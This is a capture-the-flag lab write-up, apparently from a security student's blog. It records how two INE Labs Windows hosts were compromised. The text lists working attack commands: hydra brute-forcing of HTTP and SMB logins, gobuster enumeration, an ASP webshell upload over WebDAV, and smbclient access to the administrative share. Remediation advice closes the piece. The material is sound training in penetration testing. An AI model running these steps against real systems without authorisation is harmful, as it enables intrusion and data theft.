cd ..
2025-11-01 / Log: ctf_system_host_based_attacks

System & Host Based Attacks

Host: INE Labs Diff: [MEDIUM]
#Windows#IIS#SMB#RCE

CTF Report: System & Host Based Attacks (Windows, IIS & SMB)

Date: November 2025
Classification: Host & Network Penetration Testing / System & Host Based Attacks
Targets:

  • Target 1: 10.2.28.186 (target1.ine.local) - IIS / WebDAV
  • Target 2: target2.ine.local - SMB

1. Executive Summary

This assessment focused on two internal Windows hosts. Target 1 was compromised via a dictionary attack against a misconfigured WebDAV service, leading to Remote Code Execution (RCE) through an ASP web-shell. Target 2 was breached via SMB brute-forcing, granting administrative access to the file system. These vulnerabilities demonstrate the risks of weak credentials and improper service hardening.

2. Target 1: Reconnaissance & Web Exploitation

Host Discovery

We verified connectivity to target1.ine.local. The TTL (Time To Live) of 125 indicates a Windows Operating System.

ping -c 4 target1.ine.local

Nmap scan

Service Enumeration

A full TCP port scan revealed a Windows Server running IIS 10.0, MSRPC, SMB, and Remote Desktop Services (RDP).

nmap -sV -p- 10.2.28.186

Nmap scan

Specific enumeration of Port 80 showed an IIS default page protected by Basic Authentication (401 Unauthorized).

nmap -sV -sC -p 80,135,445,3389 10.2.28.186

Nmap scan

Nmap scan

Credential Access (Hydra)

Facing a login prompt on Port 80, we performed a dictionary attack against the user “bob” using hydra.

  • Vector: HTTP-GET Brute Force
  • User: bob
  • Password Found: password_123321
hydra -l bob -P /usr/share/wordlists/metasploit/unix_passwords.txt target1.ine.local http-get

Hydra attack

The credentials allowed access to the default IIS landing page.

Landing page

Directory Enumeration

With credentials in hand, we enumerated the web directory structure using gobuster, discovering a /webdav directory.

gobuster dir -u http://target1.ine.local -w /usr/share/wordlists/dirb/common.txt -U bob --password password_123321

GoBuster attack

WebDAV Access & Flag 1

We connected to the WebDAV share using the cadaver tool. Inside, we located and retrieved the first flag.

cadaver http://target1.ine.local
cat flag1.txt

Cadaver tool and Flag 1

Remote Code Execution (RCE)

To escalate access, we exploited the WebDAV PUT method to upload a malicious ASP webshell (webshell.asp).

put /usr/share/webshells/asp/webshell.asp

Upload Webshell

Post-Exploitation (Flag 2)

Accessing the webshell via the browser [http://target1.ine.local/webdav/webshell.asp], we executed commands on the underlying Windows system. Listing the C:\ directory revealed the second flag.

dir C:\

Webshell

type C:\flag2.txt

Flag 2


3. Target 2: SMB Exploitation

Service Attack

Target 2 was identified as an SMB server. We launched a brute-force attack against the SMB protocol targeting the “administrator” account.

  • User: administrator
  • Password Found: pineapple
hydra -L common_users.txt -P unix_passwords.txt smb://target2.ine.local

Hydra attack

SMB Enumeration (Flag 3)

Using smbclient with the compromised credentials, we accessed the administrative share (C$) and found Flag 3 in the root directory.

smbclient \\target2.ine.local\C$ -U Administrator 
ls 
get flag3.txt

SMBClient and Flag 3

Lateral Movement & Flag 4

Navigating through the file system to the Administrator’s Desktop, we located the final flag.

cd Users\Administrator\Desktop 
get flag4.txt

Flag 4

Evidence Collection

Final verification of the captured flags on our local attacker machine.

Flag recap


4. Remediation Recommendations (Security+)

  1. Disable WebDAV: If not strictly required for business operations, WebDAV should be disabled on the IIS server to reduce the attack surface.
  2. Strong Password Policy: Both the “bob” and “administrator” accounts used weak, dictionary-based passwords. Implement a policy requiring complexity, length, and rotation (e.g., NIST 800-63B guidelines).
  3. Disable SMBv1/Restrict SMB: Ensure SMB is not exposed to untrusted networks. Use SMB signing to prevent relay attacks and enforce account lockouts for brute-force attempts.
  4. Least Privilege: The WebDAV user should not have write permissions to executable directories, nor should they be able to upload .asp or .aspx files (File Extension Filtering).